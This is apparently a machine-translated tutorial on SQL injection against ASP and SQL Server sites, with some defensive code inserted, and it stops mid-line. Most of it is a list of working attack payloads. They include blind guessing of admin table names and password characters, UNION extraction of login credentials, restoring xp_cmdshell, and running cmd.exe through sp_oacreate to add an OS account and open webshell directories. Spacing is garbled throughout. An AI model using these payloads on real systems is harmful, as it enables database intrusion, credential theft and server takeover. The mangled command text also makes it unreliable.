With the spread of application development in B/S (browser/server) mode, more and more programmers write programs in this model. However, because programmers' skill levels vary widely, a considerable number of applications carry security risks. A user can submit database query code and, from the results the program returns, obtain data he wants to know. This is the so-called sqlinjection, that is, the SQL injection attack.
In a script injection, the attacker inserts SQL commands into the input fields of a web form or into the query string of a page request in order to trick the server into executing malicious SQL. In some forms, the content entered by the user is used directly to build a dynamic SQL command or as an input parameter of a stored procedure, and the attacker thereby obtains passwords or other information held on the server. Once someone obtains or modifies the data in a website, that person may gain control of the whole site. As for how such data is obtained, I will not discuss MSSQL weak passwords here; the remaining route is most likely an injection vulnerability.
When a user submits a parameter to the website, the parameter is passed to the database for processing and the processed result is returned to the user; this is the most common kind of dynamic web page. However, if this parameter is not filtered, so that SQL statements we construct ourselves can take part in the database operation together with the parameter, a SQL injection vulnerability arises.
It is normal for a website to accept data from outside; it is generally received as a parameter and then processed, which involves database operations. Take an address whose query string carries the value 1 in the variable cs. This means there is a file 1.asp in the folder, and inside 1.asp a variable cs that receives an externally submitted parameter, here 1 (it could be anything else). The relevant code in 1.asp generally looks like this:
[ASP source listing lost in extraction; only the fragment cs&' survives.]
The code reads the contents of the id variable with Request and then runs a SQL query. The statement is select * from xx where id = 1, which is easy to understand. Now I will use the most classic injection-detection method and add a ' after the parameter: the statement sent to SQL Server becomes select * from xx where id = 1', with a stray ' trailing at the end, and the server reports an error.
The principle behind and 1=1 and and 1=2, contributed by bamboo, is the same:
select * from xx where id = 1 and 1 = 1
select * from xx where id = 1 and 1=2
Since 1=1 is true and 1=2 is false, the second query evaluates to true AND false, so its overall result is false and the page returns an error or nothing.
Furthermore, other SQL statements can be appended after the parameter, such as an update statement:
Update admin set passwd =' poruin' where user =' admin'
The query statement then becomes: select * from xx where id = 1; update admin set passwd = 'poruin' where user = 'admin'
This vulnerability exists not only in ASP + Access, but also in ASP + SQL Server, PHP + MySQL, JSP + Oracle, and so on.
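The concatenation pattern described above, next to the parameterized form that fixes it. This is an added illustration, not code from the original page: Python's sqlite3 stands in for ASP + SQL Server, and the table xx with its two rows is constructed here.

```python
import sqlite3


def make_db():
    # Constructed sample table standing in for the page's "xx" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table xx (id integer primary key, title text)")
    conn.executemany("insert into xx values (?, ?)",
                     [(1, "first row"), (2, "second row")])
    return conn


def lookup_vulnerable(conn, cs):
    # Same pattern as the page's 1.asp: the request value is pasted into the
    # statement text, so whatever follows the number becomes part of the SQL
    # (this is the code that "1 and 1=1" / "1 and 1=2" probes are aimed at).
    sql = "select * from xx where id = " + cs
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, cs):
    # The fix: the value travels separately from the statement text, so
    # "1 and 1=1" is compared as one literal value and is never parsed as SQL.
    return conn.execute("select * from xx where id = ?", (cs,)).fetchall()


def quote_probe_errors(conn, cs):
    # The page's classic check: does appending a ' break the statement?
    # A database error leaking to the page is exactly the signal the probe
    # looks for, which is why production error pages should be generic.
    try:
        lookup_vulnerable(conn, cs + "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, 1 and 1=1 ->", lookup_vulnerable(db, "1 and 1=1"))
    print("vulnerable, 1 and 1=2 ->", lookup_vulnerable(db, "1 and 1=2"))
    print("parameterized, 1 and 1=1 ->", lookup_parameterized(db, "1 and 1=1"))
    print("quote probe errors ->", quote_probe_errors(db, "1"))
```

Note that sqlite3 refuses more than one statement per execute call, so the stacked "; update admin ..." case from the text is not reproducible with this driver; the boolean and quote probes behave as the page describes.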
The above covers injecting SQL statements and DLLs; in fact DLL injection creates a new thread in the target process to load the DLL, which does not affect the DLL file itself.
1. Judge whether there is an injection point
; And 1=1 and 1=2
2. Guess the table name. Common table names are nothing more than admin, adminuser, pass, password, etc.
and <> (select count(*) from *)
and <> (select count(*) from admin) - judge whether there is an admin table
3. Guess the number of accounts. If the first query returns the correct page and the second returns the error page, the number of accounts is 1:
and < (select count(*) from admin)
and 1< (select count(*) from admin)
4. Guess the field names: put the field name we suspect inside the parentheses of len().
and 1 = (select count(*) from admin where len(*) > )-
and 1 = (select count(*) from admin where len(user field name) > )
and 1 = (select count(*) from admin where len(password field name) > )
5. Guess the length of each field. To guess the length, keep changing the number after > until the correct page is returned:
and 1 = (select count(*) from admin where len(*) > )
and 1 = (select count(*) from admin where len(name) > 6)   Error
and 1 = (select count(*) from admin where len(name) > 5)   Correct, so the length is 6
and 1 = (select count(*) from admin where len(name) = 6)   Correct
and 1 = (select count(*) from admin where len(password) > 11)   Correct
and 1 = (select count(*) from admin where len(password) > 12)   Error, so the length is 12
and 1 = (select count(*) from admin where len(password) = 12)   Correct
6. Guess the characters:
and 1 = (select count(*) from admin where left(name, 1) = a) - guess the first character of the user account
and 1 = (select count(*) from admin where left(name, 2) = ab) - guess the second character of the user account
Just add one character at a time, guessing as many characters as the length you just determined, and the account name comes out.
and 1 = (select top 1 count(*) from admin where asc(mid(pass, 5, 1)) = 51)-
This query can also guess Chinese user names and passwords: just change the number at the end to the character's ASCII code, and finally convert the results back into characters.
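From the defender's side, the probe sequence in steps 1 to 6 has a very recognisable shape in web server logs. The following is an added example, not part of the original page: a small signature matcher run over constructed access-log lines that mirror the probe forms shown above (boolean tests, count(*) subqueries, len()/left()/mid()/asc() guessing) and the sysobjects / xp_cmdshell / sp_oacreate names that appear further down the page.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe sequence walked through above plus the
# stored-procedure names the page mentions. Matching runs on the
# URL-decoded request so %20, + and %27 cannot hide the payload.
SIGNATURES = [
    ("boolean-test",   re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("count-subquery", re.compile(r"\bselect\s+(top\s+\d+\s+)?count\s*\(\s*\*\s*\)", re.I)),
    ("length-guess",   re.compile(r"\blen\s*\(", re.I)),
    ("char-guess",     re.compile(r"\b(left|mid|asc)\s*\(", re.I)),
    ("catalog-lookup", re.compile(r"\bsys(objects|databases)\b", re.I)),
    ("dangerous-proc", re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|sp_addextendedproc)\b", re.I)),
]


def classify(log_line):
    """Return the names of every signature that fires on one access-log line."""
    decoded = unquote_plus(log_line)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def suspicious_lines(log_lines):
    """Keep only the lines that trip at least one signature, with their hits."""
    report = {}
    for line in log_lines:
        hits = classify(line)
        if hits:
            report[line] = hits
    return report


# Constructed sample access-log lines (not taken from any real server);
# the query strings mirror the probe forms shown in the text.
SAMPLE_LOG = [
    "GET /1.asp?cs=1 HTTP/1.1",
    "GET /1.asp?cs=1%20and%201=1 HTTP/1.1",
    "GET /1.asp?cs=1+and+1=(select+count(*)+from+admin+where+len(name)>5) HTTP/1.1",
    "GET /1.asp?cs=1+and+1=(select+count(*)+from+master.dbo.sysobjects+where+name=%27xp_cmdshell%27) HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in suspicious_lines(SAMPLE_LOG).items():
        print(", ".join(hits), "<-", line)
```

A single hit on "boolean-test" can be a false positive in free-text search fields; a burst of "length-guess" and "char-guess" hits from one client against one parameter is the pattern worth alerting on.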
group by users.id having 1=1-
group by users.id, users.username, users.password, users.privity. insert into users values(666,attacker,foobar,xffff)--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id)-
(login_id, login_name)-
union select top 1 login_name from logintable-
union select top 1 password from logintable where login_name=Rahul-
Check the server's patch level (an error means it has been patched to SP4):
and 1=(select @@version)-
Check the permissions of the database connection account; a normal page proves the account holds the sysadmin server role:
and 1=(select is_srvrolemember(sysadmin))-
Determine which account connects to the database (a normal page proves the connection account is sa):
and sa=(select system_user)-
and user_name()=dbo-
and <>(select user_name()-
See whether xp_cmdshell has been deleted:
and 1=(select count(*) from master.dbo.sysobjects where xtype=x and name=xp_cmdshell)-
If xp_cmdshell has been deleted, restore it; restoring from an absolute path is also supported:
; EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog7.dll--
; Execmaster.dbo.sp _ addextendedprocxp _ cmdshell, c: \ inetpub \ wwwrootog7.dll-
Reverse ping (ping your own machine):
; use master; declare @s int; exec sp_oacreate wscript.shell,@s out; exec sp_oamethod @s,run,NULL,cmd.exe /c ping 192.168..1; -
Add an account:
; Declare @ shell int exec sp _ oacreatewscript.shell, @ shell output exec sp _ oamethod @ shell, run, null, c: \ winnt \ system32 \ cmd.exe
/cnet userjiaonian $1866574/add-
Create a virtual directory on drive E: Declare @ o int exec sp _ oacreatewscript.shell, @ o out exec sp _ oamethod @ o, run, null, cscript.exec: \ inetpub \ wwwroot \ mkwebdir.vbs-w Default Web site-V e, e: \ -
Set access attributes (written to a webshell):
declare @ o int execsp _ oacreatewscript.shell, @ o out execsp _ oamethod @ o, run, null, cscript.exec: \ inetpub \ wwwroot \ Chaccess. VBS-AW3SVC/1/root/e+browse
Special trick for bursting the database: %5c is \; alternatively submit / and \ by modifying %5
and <>(select top 1 paths from new table)-
Get the database name (dbid 1 to 5 are the system databases; only from 6 onward can user databases be judged):
and 1=(select name from master.dbo.sysdatabases where dbid=7)-
and <>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9, ... in turn to get more database names.
and <>(select top 1 name from bbs.dbo.sysobjects where xtype=u) bursts out a table name; assume it is admin
and <>(select top 1 name from bbs.dbo.sysobjects where x